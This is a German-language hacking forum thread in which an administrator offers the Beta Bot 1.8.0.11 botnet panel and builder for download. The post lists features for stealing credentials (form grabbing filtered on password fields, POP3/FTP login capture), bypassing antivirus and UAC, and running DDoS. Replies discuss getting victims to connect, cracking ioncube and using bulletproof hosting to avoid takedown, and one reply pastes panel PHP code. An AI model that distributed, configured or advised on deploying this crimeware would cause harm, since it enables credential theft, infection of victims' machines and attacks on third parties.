Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Beta Bot 1.8.0.11 | Panel + Builder

- - - - -

  • Bitte melde dich an um zu Antworten
14 Antworten in diesem Thema

#1
PaulaAbdul

PaulaAbdul

    Favoured Management

  • Administration
  • Likes
    3741
  • 2157 Beiträge
  • 3745 Bedankt
  • 1337-699
  • verifiziert
  • Android [root]
  • Windows, Linux


::

Beta Bot 1.8.0.11 | Panel + Builder

 

IGVfWAE.jpg




 

 

INFORMATIONEN
 
Version: 1.8.0.11

 
Bot Updates:
  • BTC Miner proactive defense mode added. You can now set a new proactive option that only blocks BTC miners. In addition, the BTC miner detection for the botkiller/pro. defense is now more accurate (#1)
  • Bot now reports whether or not a samsung/apple phone/device (galaxy, iphone, ipad, etc) was ever connected to the PC.
  • Formgrabber/DNS hooks now more compatible if existing software is hooking relevant functions. Bot will hook the callback of an already installed hook, if necessary
  • Formgrabber can now handle filters by content. Instead of specifying URLs to grab from, you can alternatively have the bot search for specific content of a POST request and upload if found (eg: *&password=*)
  • POP3 grabber now can intercept logins over SSL-protected connections around 40%+ of the time. Outlook mail client x86 supported. (#2)
  • Live login grabber (pop3/ftp) now uploads the domain the captured login was associated with instead of the IP address of the server. If the domain is unable to be determined, the IP will be sent instead. (#2)
  • "Ignore child processes of bot process" option added to botkiller
  • HIPS bypass updated for:
    * Norton AV/IS (HIPS)
    * ESET products (HIPS)
    * Microsoft Security Essentials - Fixed HIPS issues
    * McAfee av killer fixed. Several other McAfee products are now detected and disabled
    * Malwarebytes Pro
  • Download task / DLL load option is now fixed. Additional options added to run a CPL file, and an option to use Rundll32.exe instead of zombifying a trusted process for the downloaded DLL
  • Extra UAC bypass method implemented. It's not undiscovered, but it's relatively unused and viable for Windows 7+. Only used when bot is injected into Windows processes.
  • Disables core components of older Betabot versions (such as persistence, botkill (sometimes) and hook restoration). This functionality can be turned on/off.

 

Panel Updates:

  • You can now view what bots completed a specific task, and also specific error/success information (if available) (#3)
  • "Quick info" expandable area added for each bot entry on the main page. You can now see slightly more info on each bot by expanding it
  • Added more statistics and some graphs regarding dead bots to the statistics page
  • Individual grabbed login entries can now be deleted
  • Added more task filter options:
    * Apply task only if bot is currently marked as dirty
    * Do not apply task to any bots marked as a favorite
    * Apply task only on bots older than 24 hours
    * Apply task only on bots older than 6 hours
  • Added 'gate filters' to security settings. You can now block bot communications by country
  • Updated geoip CSV included in panel files
  • Changed look of parts of the panel
  • Added more log options for event monitor
  • Added a few options to panel settings to help optimize / speed up page loading
  • Added a new range of options in panel settings for changing minor aspects of bot functionality
  • gate_err.txt gate debug output (logs request failures) can now be toggled on/off
  • "View bot information" page added. In addition to all the other extended information (including some new attributes), you can configure the bot to upload the system process list, autostart entries from most commonly used autostart registry locations and the installed software list. These additions will give you a much greater ability to guage the usefulness of individual machines. As time goes on, more information can be collected and uploaded if useful enough
  • Panel alerts/notices feature has more options. Users can create notices in the red alert color and also create notices that are displayed on the tasks / statistics page for greater exposure. Up to 3 notices are now displayed so responses can be viewed, and the user will be notified if more than 3 notices exists.

 

Fixes/Tweaks:

  • Update functionality now slightly more reliable
  • Improved panel main bot list load time
  • Formgrab filters page now enforces filter limit. Although the bot has always refused to load a list of filters greater than 1024, now the panel actually prevents that many from ever being added
  • Fixed alignment issues on statistics page with large bot counts, as well as issue with current group display name
  • Bots marked as 'deleted' are now cleared when 'Delete dead bots' is clicked in panel settings
  • Minor changes to page numbering and the number of grabbed forms/logins displayed at one time
  • Misc tweaks made to AV killer
  • Bot now properly recognizes Windows 8.1 (as W8 on panel). Previously forgot to do this
  • Data for UDP ddos is now more randomized
  • C2 server requests optimized to consume slightly less bandwidth when bot registers with server on reboot
  • Fixed bug in formgrabber where URL filters were case-sensitive, resulting in some missed form captures if actual URL was a different case than the filter
  • Fixed a few bugs in botkiller and made some additional enhancements
  • Fixed injection issue related to low integrity processes (such as IE9+) that was causing seemingly random crashes from time to time
  • Fixed issue with memory cache support on panel where two different panels served by the same web daemon would use the same memory cache variable, thus producing very crazy results
  • Fixed encoding issue with database queries causing some characters to show up oddly
  • Fixed a bug with the login grabber sometimes (albeit rarely) mismatching credentials from different sessions
  • Fixed installation issue regarding improper DACL usage
  • Fixed issue where two updates at the same time could cause bot to corrupt installation and not come back
  • Fixed some improper uses of signed int by panel on 32-bit servers
  • Fixed by causing IP filters for tasks to not work
  • Fixed issue where log options could be unset even if user account has no privileges to view/configure logs
  • Significantly improved load time of grabbed forms/logins page
  • Made changes to reduce "duplicate bot" entries
  • Botkiller now disables unsigned BHOs for IE if option is selected. Previously was broken
  • Fixed crash issue on Windows 8 x64

 



 

Please Login HERE or Register HERE to see this link!

boardvipdownload.png


  • hacked, sniffer, Qjx1337 und 2 anderen gefällt das

401a3d5869.jpg

 

,,Der blaue Baum" von Prohex (2020)


Thanked by 6 Members:
H6ixty , gabbyadjei , raakil , terratec1991 , 1x1 , sniffer

#2
rat123

rat123

    Member

  • Premium Member
  • Likes
    97
  • 107 Beiträge
  • 31 Bedankt
  • verifiziert

Ist das eine neue Version?


Eingefügtes Bild


Thanked by 1 Member:
1x1

#3
PaulaAbdul

PaulaAbdul

    Favoured Management

  • Administration
  • Likes
    3741
  • 2157 Beiträge
  • 3745 Bedankt
  • 1337-699
  • verifiziert
  • Android [root]
  • Windows, Linux

Ist das eine neue Version?

 

Korrekt


401a3d5869.jpg

 

,,Der blaue Baum" von Prohex (2020)


#4
Rogerlopensio

Rogerlopensio

    Hacktivist

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    12
  • 54 Beiträge
  • 7 Bedankt
  • 121212
Funktionieren die DL's nur für mich nicht?

#5
xxas

xxas

    Member

  • Elite Member
  • Likes
    68
  • 136 Beiträge
  • 5 Bedankt
  • Android [root]
  • Windows, Linux

Funktionieren


​5lxmcp7utx.png


#6
Rogerlopensio

Rogerlopensio

    Hacktivist

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    12
  • 54 Beiträge
  • 7 Bedankt
  • 121212
Ok funkt bei mir jetzt auch war anscheinend ein serverproblem

#7
Caruso

Caruso

    Hacktivist

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    47
  • 51 Beiträge
  • 96 Bedankt
  • iPhone
  • Windows

Bei mir connecten keine Vics.

Hat das schon jemand zum Laufen bekommen?

 

EDIT:

Vics connecten



#8
leonalexkraus

leonalexkraus

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 8 Beiträge
  • 0 Bedankt
  • 723012

Hat jemand einen Crack für ioncube auf SunOS (ioncube_loader_sun_5.6.so)? Ansonsten bekomme ich es auf meinem Server bei Starto.de nicht zum laufen, danke! :)



#9
terratec1991

terratec1991

    Noob

  • Banned
  • PIPPIP
  • Likes
    8
  • 13 Beiträge
  • 13 Bedankt
  • iPhone
  • Windows, Linux

Ich würde es auch nicht bei Strato laufen lassen da du mit sicherheit ruck-zuck  gesperrt wirst. Versuche es mit Panamaserver.com z.B. .. Irgendeinen Bulletproof hoster


  • Redhat, zeroelday123 und Splash gefällt das

#10
Haxlor

Haxlor

    Pentester

  • Premium Member
  • Likes
    30
  • 102 Beiträge
  • 30 Bedankt
  • 123456
  • Spender

Passende ioncube_loader_lin_7.0so ? das wär hilfreich kein bock auf win

server linux


Eingefügtes Bild


#11
toprated

toprated

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    3
  • 29 Beiträge
  • 9 Bedankt

Passende ioncube_loader_lin_7.0so ? das wär hilfreich kein bock auf win

server linux

 

Ja daran hätte ich auch interesse.



#12
Zerobyte

Zerobyte

    Hacktivist

  • Premium Member
  • Likes
    63
  • 54 Beiträge
  • 209 Bedankt
  • Windows

Ich bekomme dass Panel nicht installiert. Hat jemand ein Kurzes TuT?

 

Danke

 

Edit:

 

Panel habe ich installiert bekommen aber der bot connected  nicht zu mir?


Bearbeitet von Zerobyte, 02 September 2017 - 16:44 Uhr.


#13
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    217
  • 223 Beiträge
  • 193 Bedankt

/include/index.php 

 

<?php
 
echo '<HTML><BODY><img src="../img/bp/'.@mt_rand(0, 10).'.jpg"></img></BODY></HTML>';
 
?>
 
was soll das genau bringen? haha
 
Hab mir mal den gesamten phpcode durchgelesen. Keine backdoors, aber nicht schön gecodet.
 
<?php

define('IN_UPDATETORIPS', 1);
require '../include/core.inc';
if (!defined('IN_CORE_INC')) {
    exit();
}

$num_added = 0;
if (isset($_GET['do_update'])) {
    $tor_file_data = file_get_contents('./utility/tor_ips.txt');
    if ($tor_file_data && 2048 < strlen($tor_file_data)) {
        $torip_array = explode("\n", $tor_file_data);
        if ($torip_array) {
            global $sqlDefault;
            $countalong = 0;
            echo "Truncating existing `tor_ip` table ...<br />\r\n";
            $sqlDefault->Query('TRUNCATE TABLE '.$sqlDefault->pdbname.'.tor_ips');
            foreach ($torip_array as $torip) {
                $torip2 = str_replace("\r", '', $torip);
                $torip2 = str_replace("\n", '', $torip2);
                $torip2 = str_replace("\t", '', $torip2);
                $torip2 = str_replace(' ', '', $torip2);
                $countalong = 0;
                if (0 !== ip2long($torip2)) {
                    $ip_ulong = sprintf('%u', ip2long($torip2));
                    if (!$sqlDefault->Query('INSERT INTO '.$sqlDefault->pdbname.".tor_ips VALUES('".$ip_ulong."', '0')")) {
                        echo 'Error: '.mysql_error()."<br />\r\n";
                    } else {
                        ++$num_added;
                        if (250 <= $countalong++) {
                            echo 'Progress - '.$num_added." IP(s) added since script began ...<br />\r\n";
                            $countalong = 0;
                        }
                    }
                }
            }
        } else {
            exit('Error parsing IPs into array');
        }
    } else {
        exit('Unable to get TOR IPs file data');
    }
}

if (0 < $num_added) {
    exit('Added '.$num_added.' IP(s) to blacklist');
}

echo "\n<HTML>\n\n<a href=\"";
echo $_SERVER['REQUEST_URI'].'&do_update=true';
echo "\">Click here to read /tor_ips.txt and insert those IPs into DB!tor_ips table</a>\n\n</HTML>";

?>


#14
zeroelday123

zeroelday123

    Leecher

  • Members
  • PIP
  • Likes
    0
  • 0 Beiträge
  • 0 Bedankt

Funktioniert dieses Botnet auch für neuere Windows Betriebsysteme wie Windows 8 oder Windows Server 2016 zum infecten?



#15
runebang

runebang

    Leecher

  • Members
  • PIP
  • Likes
    0
  • 1 Beiträge
  • 1 Bedankt

Hello. I have set this up on a linux server and got ioncube working. But when I click my ip/setup.php i just see a blank page. Anyone know how to proceed from this?





  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 244 user(s)


    #LanceButters, 007, 0x92, 133TFoX, 1x1, 2242, 3even, 3eyes, 3xc3ll3nt, abuleyla, adn1337, alio202, Alsuna, ANDYANDREY, Antonio24, arcticfly, Avni, b0kerst3l, baba yugo, Back, Bad Grandpa, baddog, Billor, BlackDante, Bloodman, blue_eyed_devil, Boneau, bones, brilla, brucereed64, c3rberus, C4shin0ut, Caruso, Cear, Ch!ller, clusterhead, ClusterZ, Crap, craq, cruzz, Cryptologic, cubik, cyb3rfly, CyberFlash, D3n1s230290, Da'Wav.s, dado187, daredevil_hellfire207, DarKdb, darknide, dd34t0r, Dean36, decent, DeepWater, dep0x, derballast, desmond, DieHinata, Dr. Spic, drsam4545, dts1, dtype1984, dvalar, eXalT, exetex, exploitablerootkit, Exynos, fake2pay, fl4shx, fluffybunny, Framerater, Franziskaner, Freshpolak, funstyler, g0rillaz, Gatsby13, Geilokowski, GhostSteel, Giganet, gr33d, Gragg23, gtawelt, gutzuu, h04x, hacke2010, hacked, hackfrank, halymaly, Haxlor, headshotde, Henry Dorsett, hlaus777, hupfumme, Husti_nett, in0ut, Jack_Frost, Jackdaniels, jacktha, jimador, jmPesp, Joey2, JohnJaztime, JohnMurdoc, johnny, JohnR, Joker Dark Knight, Jozu, JU571C3, Juri, K31X, Kaase, Karma, KartRazer, keyb0ardz, KizZamp, Klaus, kleinkriminell, Klopfer, Kodo, Koffee, Koiner65, Kraenk, Leak, leonalexkraus, lNobodyl, loginman1, loken, LVArturs, m0nk3y, Makiavelic, malicious, mantwohouse, mashok, matrix567, Methyl, mettbrot, MiD_NiGHT, Mila, Mini Rick, Mofug, Moldey, most_uniQue, Muechner147, n1nja, N4dja, n4pst3r, nEOx04, Nexus88, nginx, nibble nibble, nischke, nninja, nong_dan, notfound, o0o, OMEGA, Osed28, PadX18, Passport, PaulaAbdul, peppi200, pfadn, Ph@ntom, PHIPU, phoenixx592, phr, phreekyo, pi^2, Platon666, ProHex, Pseudo, Psykoon303, Pyerun, python_snippet, Qjx1337, raakil, Rastajan, rat123, ReBBeL, Redhat, repjona, RGBJunge18, Rodarock, Rogerlopensio, Rothschild, Rumpelstielzchen2.0, Sarin, SavE1, Sayco, SecurityFlaw, Seki92, Seldos, Sezession, shiznith, shok0, siddis, smc2014, Snapfish, sniffer, st0rm, st4rm, Stalin, starz, Static, Statine, stoneserv, sup3ria, syncing, T00LStar, TechVPN, terratec1991, the.3nd, TheLoneWolf, Theman, thistime, Thugger, toprated, Toskom4n, TuttiFrutti, twixeis, VerZus, vital, Vutra, w0tan, waswillstdu, wbx32, webpanel0815, westendboy, White-Warti, Wizkalifa, Woodenhero, x1z0ng, Xantar, Xarr4, xcrimeex, xmmlegends, xrahitel, xsstoday, xVirtu, xxas, y30629862, yaqwerdx, Zerobyte, Zorrez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.